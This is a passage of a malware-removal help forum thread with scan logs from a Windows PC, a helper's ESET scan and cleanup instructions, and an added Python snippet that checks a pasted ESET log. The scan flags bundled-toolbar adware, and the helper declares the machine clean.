2014-09-10 09:04 - 2014-09-10 09:04 - 04901352 _____ (Piriform Ltd) C:\Users\Paul\Downloads\ccsetup417.exe
2014-09-09 14:57 - 2014-09-09 15:01 - 00000000 ____D () C:\SERT
2014-09-06 08:16 - 2014-09-10 10:13 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-09-06 08:14 - 2014-09-06 08:14 - 00000000 ____D () C:\found.000
2014-09-06 07:29 - 2014-09-06 07:29 - 00001062 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-06 07:29 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-06 06:50 - 2014-09-06 06:50 - 00000065 ____H () C:\Windows\system32\38891.bat
2014-08-29 10:21 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-29 10:21 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-29 10:21 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-29 10:21 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-29 10:18 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-29 10:18 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-29 10:18 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-29 10:18 - 2014-07-13 20:42 - 00654336 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-29 10:18 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-29 10:18 - 2014-06-15 20:44 - 00730048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-29 10:18 - 2014-06-15 20:44 - 00219072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2014-08-29 10:18 - 2014-06-15 20:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-08-29 10:18 - 2014-06-03 04:30 - 00101824 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-29 10:18 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-29 10:18 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-29 10:18 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-28 10:02 - 2014-08-28 10:02 - 00002104 _____ () C:\Users\Public\Desktop\Carbonite InfoCenter.lnk
2014-08-28 10:02 - 2014-08-28 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Carbonite
2014-08-28 10:01 - 2014-08-28 10:02 - 00000086 _____ () C:\Users\Public\Desktop\Carbonite Setup.log
2014-08-23 06:25 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 06:25 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 06:24 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 06:24 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 06:24 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-23 06:24 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-23 06:24 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-22 09:32 - 2014-08-22 09:32 - 00000978 _____ () C:\Users\Public\Desktop\Stamps.com.lnk
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stamps.com
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 09:30 - 2013-09-23 13:48 - 00147912 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2014-08-19 07:46 - 2014-08-19 07:46 - 00001755 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\Program Files\iPod
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-11 12:37 - 2014-09-10 14:20 - 00000000 ____D () C:\FRST
2014-09-11 12:35 - 2014-05-09 11:58 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001UA1cf6ba7e2bf6cd8.job
2014-09-11 12:35 - 2009-07-13 23:34 - 00031312 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-11 12:35 - 2009-07-13 23:34 - 00031312 _____ () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-11 12:32 - 2010-11-20 16:01 - 00801238 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-11 12:28 - 2014-09-11 12:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink PowerDVD 9.5
2014-09-11 12:27 - 2014-09-10 13:43 - 00001484 _____ () C:\Windows\PFRO.log
2014-09-11 12:27 - 2014-09-10 11:28 - 00001020 _____ () C:\Windows\setupact.log
2014-09-11 12:27 - 2011-10-01 07:29 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-11 12:27 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-11 12:26 - 2014-09-10 10:55 - 00206584 _____ () C:\Windows\WindowsUpdate.log
2014-09-11 12:19 - 2014-06-22 09:14 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf8e2452dd23be.job
2014-09-11 11:53 - 2012-04-13 05:42 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-11 11:37 - 2011-10-09 10:37 - 00000000 ____D () C:\Program Files\Common Files\Mcafee
2014-09-11 11:12 - 2014-09-11 11:12 - 00053903 _____ () C:\ComboFix.txt
2014-09-11 11:12 - 2014-09-11 09:49 - 00000000 ____D () C:\Qoobox
2014-09-11 11:12 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-11 11:12 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-11 11:10 - 2014-09-11 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-09-11 11:10 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-09-11 11:08 - 2011-09-28 06:36 - 00000000 ____D () C:\Users\Paul
2014-09-11 10:38 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-11 09:41 - 2014-09-11 09:57 - 05576769 ____R (Swearware) C:\Users\Paul\Desktop\ComboFix.exe
2014-09-10 13:35 - 2013-08-15 03:05 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-10 12:42 - 2011-10-09 06:26 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-10 12:41 - 2014-04-24 08:34 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-10 11:28 - 2014-09-10 11:28 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-10 10:59 - 2014-09-10 10:59 - 00000000 ____D () C:\Windows\pss
2014-09-10 10:51 - 2014-09-10 10:51 - 00211818 _____ () C:\Users\Paul\Documents\cc_20140910_105122.reg
2014-09-10 10:50 - 2011-11-06 10:57 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Skype
2014-09-10 10:50 - 2011-02-10 11:03 - 00000000 ____D () C:\Windows\panther
2014-09-10 10:13 - 2014-09-06 08:16 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamswissarmy.sys
2014-09-10 09:53 - 2011-09-28 06:50 - 00002365 _____ () C:\Users\Paul\Desktop\Google Chrome.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000967 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-10 09:05 - 2014-09-10 09:05 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-10 09:04 - 2014-09-10 09:04 - 04901352 _____ (Piriform Ltd) C:\Users\Paul\Downloads\ccsetup417.exe
2014-09-10 08:55 - 2012-04-13 05:42 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-10 08:55 - 2011-09-19 11:22 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-10 07:09 - 2011-09-29 17:24 - 00000000 ____D () C:\Users\Paul\Documents\Outlook Files
2014-09-10 05:35 - 2014-03-29 06:30 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-296848781-3995833910-2275520707-1001Core1cf4b42484e052c.job
2014-09-09 15:56 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-09-09 15:01 - 2014-09-09 14:57 - 00000000 ____D () C:\SERT
2014-09-06 11:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-09-06 08:14 - 2014-09-06 08:14 - 00000000 ____D () C:\found.000
2014-09-06 07:30 - 2014-02-06 14:12 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Malwarebytes
2014-09-06 07:29 - 2014-09-06 07:29 - 00001062 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-09-06 07:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-06 07:29 - 2014-02-06 14:12 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-06 07:29 - 2014-02-06 14:12 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-06 07:02 - 2011-10-09 10:02 - 00000000 ____D () C:\ProgramData\McAfee
2014-09-06 06:50 - 2014-09-06 06:50 - 00000065 ____H () C:\Windows\system32\38891.bat
2014-09-04 20:52 - 2014-09-10 11:55 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-10 11:55 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-29 10:33 - 2009-07-13 23:33 - 00416160 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-28 10:02 - 2014-08-28 10:02 - 00002104 _____ () C:\Users\Public\Desktop\Carbonite InfoCenter.lnk
2014-08-28 10:02 - 2014-08-28 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Carbonite
2014-08-28 10:02 - 2014-08-28 10:01 - 00000086 _____ () C:\Users\Public\Desktop\Carbonite Setup.log
2014-08-22 20:46 - 2014-08-29 10:18 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-29 10:18 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 09:32 - 2014-08-22 09:32 - 00000978 _____ () C:\Users\Public\Desktop\Stamps.com.lnk
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stamps.com
2014-08-22 09:32 - 2014-08-22 09:32 - 00000000 ____D () C:\ProgramData\{15443AB6-DA1B-46B5-A9BB-1311ED40AB1A}
2014-08-22 09:32 - 2013-12-11 10:01 - 00000000 ____D () C:\Users\Paul\AppData\Roaming\Stamps.com Internet Postage
2014-08-22 09:32 - 2013-12-11 10:00 - 00000036 ____H () C:\Windows\system32\f9t.dat
2014-08-22 09:32 - 2013-12-11 10:00 - 00000000 ____D () C:\Program Files\Stamps.com Internet Postage
2014-08-19 12:39 - 2014-09-10 13:38 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-19 07:46 - 2014-08-19 07:46 - 00001755 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-19 07:46 - 2014-08-19 07:46 - 00000000 ____D () C:\Program Files\iPod
2014-08-19 07:46 - 2011-10-01 07:59 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-19 07:46 - 2011-09-30 15:47 - 00000000 ____D () C:\Program Files\iTunes
2014-08-18 17:26 - 2014-09-10 13:38 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-10 13:38 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-10 13:38 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-10 13:38 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-10 13:38 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-10 13:38 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-10 13:38 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-10 13:38 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-10 13:38 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-10 13:38 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-10 13:38 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-10 13:38 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-10 13:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-10 13:38 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-10 13:38 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-10 13:38 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-10 13:38 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-10 13:38 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-10 13:38 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-10 13:38 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-10 13:38 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-10 13:38 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-10 13:38 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-10 13:38 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-10 13:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-10 13:38 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-10 13:38 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-10 13:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-10 13:38 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-12 08:11 - 2011-09-19 11:28 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN
2014-08-12 08:11 - 2011-09-19 11:28 - 00000000 ____D () C:\Windows\system32\vs08
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\th-TH
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sl-SI
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sk-SK
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ro-RO
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\lv-LV
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\lt-LT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\et-EE
2014-08-12 08:11 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Help
2014-08-12 08:10 - 2011-09-19 11:28 - 07348224 _____ (Dell Inc.) C:\Windows\system32\BCMWLCPL.CPL
2014-08-12 08:10 - 2011-09-19 11:28 - 04513792 _____ (Dell Inc.) C:\Windows\system32\bcmttls.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 02682880 _____ (Microsoft Corporation) C:\Windows\system32\vcredist_x86.exe
2014-08-12 08:10 - 2011-09-19 11:28 - 01022976 _____ (Dell Inc.) C:\Windows\system32\BCMLogon.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00057344 _____ (Broadcom Corporation) C:\Windows\system32\bcmwlrmt.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00051712 _____ (Broadcom Corporation) C:\Windows\system32\wltrynt.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00050704 _____ (CACE Technologies, Inc.) C:\Windows\system32\Drivers\npf.sys
2014-08-12 08:10 - 2011-09-19 11:28 - 00018424 _____ (Broadcom Corporation) C:\Windows\system32\Drivers\bcm42rly.sys
2014-08-12 08:10 - 2011-09-19 11:28 - 00006656 _____ () C:\Windows\system32\bcmwlrc.dll
2014-08-12 08:10 - 2011-09-19 11:28 - 00000457 _____ () C:\Windows\system32\vcredist_x86.bat
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hr-HR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\he-IL
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\bg-BG
2014-08-12 08:10 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ar-SA
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-09 15:48
 
==================== End Of Log ============================


#8 aharonov

  • Malware Response Team

Posted 11 September 2014 - 01:08 PM

Ok, this worked well. How is your computer running now?


Please download the ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start esetsmartinstaller_enu.exe with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!

#9 morris79

  • Topic Starter

Posted 12 September 2014 - 09:17 AM

Here it is.

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=ee63a0925bd6b44eabbe0dbaa1fac6d1
# engine=20112
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-12 01:46:04
# local_time=2014-09-12 08:46:04 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='McAfee Anti-Virus and Anti-Spyware'
# compatibility_mode=5124 16777214 88 100 0 172392942 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 35991365 162074355 0 0
# scanned=148226
# found=6
# cleaned=0
# scan_time=69996
sh=0BB64F54CAA8A47889A19FC122706A789656E0AA ft=1 fh=96ba92304b133aaf vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\precache.exe"
sh=C6BFD87DFA88D2079A16DC77887D9A4CC133B274 ft=1 fh=8e4a37a044b6b1cc vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\SaUpdate.exe"
sh=C2EAFF8EE17CAA897838770F3344B4822A587CBF ft=1 fh=e234678fdc8a8642 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\UpdateTask.exe"
sh=51E5F9D19ED3EC2EEFCB4BF3B2105A464BEC2D4A ft=1 fh=6931b7fb73b262fc vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Program Files\Ask.com\Updater\Updater.exe"
sh=1DE5D70A411EBBF4441FD569E7427CC28A4D6B13 ft=1 fh=b572351b8a033ea9 vn="Win32/Bundled.Toolbar.Google.D potentially unsafe application" ac=I fn="C:\Users\Paul\Downloads\ccsetup417.exe"
sh=B88878620FC04B52A91500A58C7D60D1A98AB7A6 ft=0 fh=0000000000000000 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application" ac=I fn="C:\Windows\Installer\87881b.msi"
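
As an added example (not part of the original posts, and not ESET's or the helper's own tooling): a short Python check that a pasted ESET Online Scanner log reflects the scan options requested in post #8, and that lists any detection not labelled "potentially unwanted/unsafe application". The sample log, with its hashes, detection names and paths, is constructed; using the label at the end of `vn` as the triage signal is an assumption.

```python
import re

# Scan options requested in post #8, as they appear in the "# key=value" header.
EXPECTED = {
    "remove_checked": "false",
    "archives_checked": "true",
    "unwanted_checked": "true",
    "unsafe_checked": "true",
    "antistealth_checked": "true",
}
# key=value pairs on a detection line; values may be double-quoted.
PAIR = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_log(text):
    """Split a pasted log into header settings and detection records."""
    header, detections = {}, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# ") and "=" in line:
            key, _, value = line[2:].partition("=")
            header[key] = value  # keys can repeat; the last one wins
        elif line.startswith("sh="):
            detections.append({m[1]: m[2] if m[2] is not None else m[3]
                               for m in PAIR.finditer(line)})
    return header, detections

def review(text):
    """Report option mismatches, count consistency and detections to look at."""
    header, detections = parse_log(text)
    wrong = {k: header.get(k) for k, v in EXPECTED.items() if header.get(k) != v}
    # Assumption: anything not labelled "potentially un(wanted|safe)" needs review.
    serious = [d["fn"] for d in detections if "potentially un" not in d.get("vn", "")]
    return {"settings_wrong": wrong,
            "count_ok": header.get("found") == str(len(detections)),
            "detections": len(detections),
            "needs_attention": serious}

# Constructed sample log (placeholder hashes, names and paths).
SAMPLE = r'''# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# found=2
sh=0000000000000000000000000000000000000000 ft=1 fh=0000000000000000 vn="a variant of Win32/Example.Toolbar.A potentially unsafe application" ac=I fn="C:\Example\toolbar.exe"
sh=1111111111111111111111111111111111111111 ft=1 fh=1111111111111111 vn="Win32/Example.Trojan.B trojan" ac=I fn="C:\Example\dropper.exe"
'''

if __name__ == "__main__":
    print(review(SAMPLE))
```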
 



#10 aharonov

  • Malware Response Team

Posted 12 September 2014 - 09:28 AM

It's looking good. :)

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Online Scanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Java™ 6 Update 35




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#11 morris79

  • Topic Starter

Posted 12 September 2014 - 09:47 AM

Thanks Much!!!!!



#12 aharonov

